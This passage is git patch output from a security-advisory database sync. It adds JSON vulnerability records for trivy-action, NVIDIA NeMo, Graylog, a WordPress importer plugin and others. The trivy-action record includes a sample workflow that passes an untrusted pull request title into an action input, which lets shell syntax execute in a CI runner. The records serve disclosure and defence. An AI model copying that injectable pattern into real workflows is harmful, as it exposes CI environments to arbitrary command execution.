context.\n\n**Severity:**\n\nModerate\n\nCVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N\n\nCWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)\n\n**Impact:**\n\nSuccessful exploitation may lead to arbitrary command execution in the CI runner environment.\n\n\n**Affected Versions:**\n\n* Versions >= 0.31.0 and <= 0.33.1\n* Introduced in commit `7aca5ac`\n\n**Affected Conditions:**\n\nThe vulnerability is exploitable when a consuming workflow passes attacker-controlled data into any action input that is written to `trivy_envs.txt`. Access to user input is required by the malicious actor.\n\nA representative exploitation pattern involves incorporating untrusted pull request metadata into an action parameter. For example:\n\n```yaml\n- uses: aquasecurity/trivy-action@0.33.1\n with:\n output: \"trivy-${{ github.event.pull_request.title }}.sarif\"\n```\n\nIf the pull request title contains shell syntax, it may be executed when the generated environment file is sourced.\n\n**Not Affected:**\n\n* Workflows that do not pass attacker-controlled data into `trivy-action` inputs\n* Workflows that upgrade to a patched version that properly escapes shell values or eliminates the `source ./trivy_envs.txt` pattern\n* Workflows where user input is not accessible.\n\n**Call Sites:**\n\n* `action.yaml:188` — `set_env_var_if_provided` writes unescaped `export` lines\n* `entrypoint.sh:9` — sources `./trivy_envs.txt`", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "GitHub Actions", + "name": "aquasecurity/trivy-action" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.31.0" + }, + { + "fixed": "0.34.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/aquasecurity/trivy-action/security/advisories/GHSA-9p44-j4g5-cfx5" + }, + { + "type": "WEB", + "url": "https://github.com/aquasecurity/trivy-action/commit/7aca5acc9500b463826cc47a47a65ad7d404b045" + }, + { + "type": "WEB", + "url": "https://github.com/aquasecurity/trivy-action/commit/bc61dc55704e2d5704760f3cdab0d09acf16e4ca" + }, + { + "type": "PACKAGE", + "url": "https://github.com/aquasecurity/trivy-action" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T15:24:43Z", + "nvd_published_at": null + } +} \ No newline at end of file From 0a0ba0fbbcef82bb8162806cb464536c5fcecc15 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 15:33:14 +0000 Subject: [PATCH 152/215] Advisory Database Sync --- .../GHSA-65c5-j3wr-v7fh.json | 6 +- .../GHSA-8jj6-9qc9-r5x4.json | 3 +- .../GHSA-25w3-5rm9-v4wm.json | 40 +++++++++++++ .../GHSA-2cpx-h862-rqm6.json | 40 +++++++++++++ .../GHSA-3crm-x896-j73p.json | 36 +++++++++++ .../GHSA-47m2-7g75-xvrp.json | 36 +++++++++++ .../GHSA-49xw-73mm-8fw9.json | 36 +++++++++++ .../GHSA-4m8q-p6h8-x2wj.json | 4 +- .../GHSA-54p7-3rpx-pjfc.json | 48 +++++++++++++++ .../GHSA-568p-hhxc-vvx8.json | 15 +++-- .../GHSA-5fc6-h8m7-2wfc.json | 4 +- .../GHSA-5g82-gg27-r8vp.json | 15 +++-- .../GHSA-5hp8-hwcv-h225.json | 36 +++++++++++ .../GHSA-5rm9-pcp8-m6v8.json | 40 +++++++++++++ .../GHSA-6jg9-x4w8-gj7j.json | 4 +- .../GHSA-6qr6-c44j-c793.json | 60 +++++++++++++++++++ .../GHSA-74jq-6q38-p5wf.json | 4 +- .../GHSA-77vx-jc7r-586m.json | 37 ++++++++++++ .../GHSA-787p-86v4-hhfg.json | 33 ++++++++++ .../GHSA-78p6-wh6m-9r9w.json | 36 +++++++++++ .../GHSA-7jfh-hm8h-m5rq.json | 4 +- .../GHSA-85h6-5m3v-gx37.json | 29 +++++++++ .../GHSA-87ff-rq35-47jj.json | 36 +++++++++++ .../GHSA-8rh3-rvv2-3mr4.json | 4 +- .../GHSA-933h-c422-j33j.json | 40 +++++++++++++ .../GHSA-9379-mwvr-7wxx.json | 40 +++++++++++++ .../GHSA-964f-vc2f-ch6j.json | 15 +++-- .../GHSA-c5gg-v573-hv7f.json | 33 ++++++++++ .../GHSA-cf26-rj67-f4wr.json | 36 +++++++++++ .../GHSA-cw7v-qx8m-563q.json | 36 +++++++++++ .../GHSA-f7cx-4c4g-9g59.json | 36 +++++++++++ .../GHSA-f86v-54pm-58q4.json | 40 +++++++++++++ .../GHSA-ff7j-jwgr-hgxp.json | 36 +++++++++++ .../GHSA-fjxh-qxr5-g7j4.json | 45 ++++++++++++++ .../GHSA-fqmg-pv5x-v55p.json | 40 +++++++++++++ .../GHSA-g5pw-hppv-79r6.json | 37 ++++++++++++ .../GHSA-gcr4-23wm-438x.json | 40 +++++++++++++ .../GHSA-ghfm-hghj-9j75.json | 15 +++-- .../GHSA-h85r-3jrw-9546.json | 37 ++++++++++++ .../GHSA-hr8m-gc74-4f7w.json | 4 +- .../GHSA-hr98-gm7c-926r.json | 37 ++++++++++++ .../GHSA-hvjw-vp7g-39h5.json | 40 +++++++++++++ .../GHSA-j9p7-7ww6-3mjx.json | 40 +++++++++++++ .../GHSA-jfq5-qg8x-7rmp.json | 53 ++++++++++++++++ .../GHSA-jxgv-6j54-wwc7.json | 56 +++++++++++++++++ .../GHSA-m8v3-m8mg-rrc7.json | 33 ++++++++++ .../GHSA-mx8g-qc6m-wcmf.json | 33 ++++++++++ .../GHSA-p4q3-g549-vvfc.json | 44 ++++++++++++++ .../GHSA-pc38-57g8-39gg.json | 15 +++-- .../GHSA-phqg-p332-q7vc.json | 45 ++++++++++++++ .../GHSA-q543-x74m-r8q9.json | 4 +- .../GHSA-qq2v-q6qr-p5vx.json | 40 +++++++++++++ .../GHSA-qq7g-427f-cm2r.json | 56 +++++++++++++++++ .../GHSA-r264-whc7-wwfw.json | 33 ++++++++++ .../GHSA-r4m3-cm43-fxrj.json | 48 +++++++++++++++ .../GHSA-r77x-pqm4-6252.json | 36 +++++++++++ .../GHSA-rgjw-pqcr-56gf.json | 36 +++++++++++ .../GHSA-rjm5-gmfm-6cp4.json | 60 +++++++++++++++++++ .../GHSA-rv75-v2gv-p54c.json | 40 +++++++++++++ .../GHSA-rvhp-mghq-8mvw.json | 15 +++-- .../GHSA-vfmw-4jmp-wmrw.json | 36 +++++++++++ .../GHSA-vqcj-rgfw-jjcq.json | 37 ++++++++++++ .../GHSA-vw84-mx3m-hw5p.json | 48 +++++++++++++++ .../GHSA-vwcq-x7gx-g26f.json | 36 +++++++++++ .../GHSA-wfhp-qgm8-5p5c.json | 29 +++++++++ .../GHSA-whmh-gx62-v47m.json | 36 +++++++++++ .../GHSA-wq2g-h2h9-v8x3.json | 36 +++++++++++ .../GHSA-wvvh-pcq5-hc6f.json | 40 +++++++++++++ .../GHSA-ww2j-3p54-3m69.json | 44 ++++++++++++++ .../GHSA-x536-g6fc-g963.json | 36 +++++++++++ 70 files changed, 2244 insertions(+), 34 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-25w3-5rm9-v4wm/GHSA-25w3-5rm9-v4wm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2cpx-h862-rqm6/GHSA-2cpx-h862-rqm6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-54p7-3rpx-pjfc/GHSA-54p7-3rpx-pjfc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5rm9-pcp8-m6v8/GHSA-5rm9-pcp8-m6v8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6qr6-c44j-c793/GHSA-6qr6-c44j-c793.json create mode 100644 advisories/unreviewed/2026/02/GHSA-77vx-jc7r-586m/GHSA-77vx-jc7r-586m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-787p-86v4-hhfg/GHSA-787p-86v4-hhfg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-78p6-wh6m-9r9w/GHSA-78p6-wh6m-9r9w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json create mode 100644 advisories/unreviewed/2026/02/GHSA-87ff-rq35-47jj/GHSA-87ff-rq35-47jj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-933h-c422-j33j/GHSA-933h-c422-j33j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c5gg-v573-hv7f/GHSA-c5gg-v573-hv7f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f86v-54pm-58q4/GHSA-f86v-54pm-58q4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fjxh-qxr5-g7j4/GHSA-fjxh-qxr5-g7j4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fqmg-pv5x-v55p/GHSA-fqmg-pv5x-v55p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g5pw-hppv-79r6/GHSA-g5pw-hppv-79r6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gcr4-23wm-438x/GHSA-gcr4-23wm-438x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h85r-3jrw-9546/GHSA-h85r-3jrw-9546.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hr98-gm7c-926r/GHSA-hr98-gm7c-926r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j9p7-7ww6-3mjx/GHSA-j9p7-7ww6-3mjx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jfq5-qg8x-7rmp/GHSA-jfq5-qg8x-7rmp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jxgv-6j54-wwc7/GHSA-jxgv-6j54-wwc7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m8v3-m8mg-rrc7/GHSA-m8v3-m8mg-rrc7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mx8g-qc6m-wcmf/GHSA-mx8g-qc6m-wcmf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p4q3-g549-vvfc/GHSA-p4q3-g549-vvfc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qq2v-q6qr-p5vx/GHSA-qq2v-q6qr-p5vx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r77x-pqm4-6252/GHSA-r77x-pqm4-6252.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rgjw-pqcr-56gf/GHSA-rgjw-pqcr-56gf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rjm5-gmfm-6cp4/GHSA-rjm5-gmfm-6cp4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vqcj-rgfw-jjcq/GHSA-vqcj-rgfw-jjcq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json diff --git a/advisories/unreviewed/2025/12/GHSA-65c5-j3wr-v7fh/GHSA-65c5-j3wr-v7fh.json b/advisories/unreviewed/2025/12/GHSA-65c5-j3wr-v7fh/GHSA-65c5-j3wr-v7fh.json index 01cd958178615..2238032141356 100644 --- a/advisories/unreviewed/2025/12/GHSA-65c5-j3wr-v7fh/GHSA-65c5-j3wr-v7fh.json +++ b/advisories/unreviewed/2025/12/GHSA-65c5-j3wr-v7fh/GHSA-65c5-j3wr-v7fh.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-65c5-j3wr-v7fh", - "modified": "2025-12-15T12:30:27Z", + "modified": "2026-02-18T15:31:23Z", "published": "2025-12-15T12:30:27Z", "aliases": [ "CVE-2025-14714" ], "details": "An Authentication Bypass vulnerability existed where the application bundled an interpreter (Python) that inherits the Transparency, Consent, and Control (TCC) permissions granted by the user to the main application bundle\n\n\n\n\nBy executing the bundled interpreter directly the attacker's scripts run with the application's TCC privileges\n\n\n\n\nIn fixed versions parent-constraints are used to allow only the main application to launch interpreter with those permissions\n\nThis issue affects LibreOffice on macOS: from 25.2 before < 25.2.4.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/01/GHSA-8jj6-9qc9-r5x4/GHSA-8jj6-9qc9-r5x4.json b/advisories/unreviewed/2026/01/GHSA-8jj6-9qc9-r5x4/GHSA-8jj6-9qc9-r5x4.json index 903dee9e88dfb..0504fcb51c51b 100644 --- a/advisories/unreviewed/2026/01/GHSA-8jj6-9qc9-r5x4/GHSA-8jj6-9qc9-r5x4.json +++ b/advisories/unreviewed/2026/01/GHSA-8jj6-9qc9-r5x4/GHSA-8jj6-9qc9-r5x4.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-120" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-25w3-5rm9-v4wm/GHSA-25w3-5rm9-v4wm.json b/advisories/unreviewed/2026/02/GHSA-25w3-5rm9-v4wm/GHSA-25w3-5rm9-v4wm.json new file mode 100644 index 0000000000000..2addfc455c227 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-25w3-5rm9-v4wm/GHSA-25w3-5rm9-v4wm.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-25w3-5rm9-v4wm", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33246" + ], + "details": "NVIDIA NeMo Framework for all platforms contains a vulnerability in the ASR Evaluator utility, where a user could cause a command injection by supplying crafted input to a configuration parameter. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, or information disclosure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33246" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33246" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2cpx-h862-rqm6/GHSA-2cpx-h862-rqm6.json b/advisories/unreviewed/2026/02/GHSA-2cpx-h862-rqm6/GHSA-2cpx-h862-rqm6.json new file mode 100644 index 0000000000000..a1c64fdff3b74 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2cpx-h862-rqm6/GHSA-2cpx-h862-rqm6.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2cpx-h862-rqm6", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33243" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution in distributed environments. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33243" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33243" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json b/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json new file mode 100644 index 0000000000000..f16f154739d21 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3crm-x896-j73p", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1435" + ], + "details": "Not properly invalidated session vulnerability in Graylog Web Interface, version 2.2.3, due to incorrect management of session invalidation after new logins. The application generates a new 'sessionId' each time a user authenticates, but does not invalidate previously issued session identifiers, which remain valid even after multiple consecutive logins by the same user. As a result, a stolen or leaked 'sessionId' can continue to be used to authenticate valid requests. Exploiting this vulnerability would allow an attacker with access to the web service/API network (port 9000 or HTTP/S endpoint of the server) to reuse an old session token to gain unauthorized access to the application, interact with the API/web, and compromise the integrity of the affected account.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1435" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-613" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json b/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json new file mode 100644 index 0000000000000..92410cc1fc832 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-47m2-7g75-xvrp", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1440" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/pipelines/' endpoint.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1440" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json b/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json new file mode 100644 index 0000000000000..3e7b6867826cb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-49xw-73mm-8fw9", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1439" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/\n\nalerts\n\n/' endpoint.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1439" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json b/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json index 406dcef173473..bd3247190334c 100644 --- a/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json +++ b/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json @@ -41,7 +41,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-119" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-54p7-3rpx-pjfc/GHSA-54p7-3rpx-pjfc.json b/advisories/unreviewed/2026/02/GHSA-54p7-3rpx-pjfc/GHSA-54p7-3rpx-pjfc.json new file mode 100644 index 0000000000000..ad028655b3deb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-54p7-3rpx-pjfc/GHSA-54p7-3rpx-pjfc.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-54p7-3rpx-pjfc", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2026-1317" + ], + "details": "The WP Import – Ultimate CSV XML Importer for WordPress plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 7.37. This is due to insufficient escaping on the `file_name` parameter which is stored in the database during file upload and later used in raw SQL queries without proper sanitization. This makes it possible for authenticated attackers with Subscriber-level access or higher to append additional SQL queries into already existing queries via a malicious filename, which can be used to extract sensitive information from the database. The vulnerability can only be exploited when the 'Single Import/Export' option is enabled, and the server is running a PHP version < 8.0.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1317" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-ultimate-csv-importer/tags/7.34/managerExtensions/LogManager.php#L763" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-ultimate-csv-importer/tags/7.34/uploadModules/UrlUpload.php#L181" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3445414" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fd80133d-03c7-4ecb-ad2c-98950f788ca6?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T13:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json b/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json index 85d2b669e2761..38232cd095362 100644 --- a/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json +++ b/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-568p-hhxc-vvx8", - "modified": "2026-02-18T06:30:19Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-18T06:30:19Z", "aliases": [ "CVE-2026-1368" ], "details": "The Video Conferencing with Zoom WordPress plugin before 4.6.6 contains an AJAX handler that has its nonce verification commented out, allowing unauthenticated attackers to generate valid Zoom SDK signatures for any meeting ID and retrieve the site's Zoom SDK key.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T06:16:34Z" diff --git a/advisories/unreviewed/2026/02/GHSA-5fc6-h8m7-2wfc/GHSA-5fc6-h8m7-2wfc.json b/advisories/unreviewed/2026/02/GHSA-5fc6-h8m7-2wfc/GHSA-5fc6-h8m7-2wfc.json index 8b64705509c5c..3fe6391c73d04 100644 --- a/advisories/unreviewed/2026/02/GHSA-5fc6-h8m7-2wfc/GHSA-5fc6-h8m7-2wfc.json +++ b/advisories/unreviewed/2026/02/GHSA-5fc6-h8m7-2wfc/GHSA-5fc6-h8m7-2wfc.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-200" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git 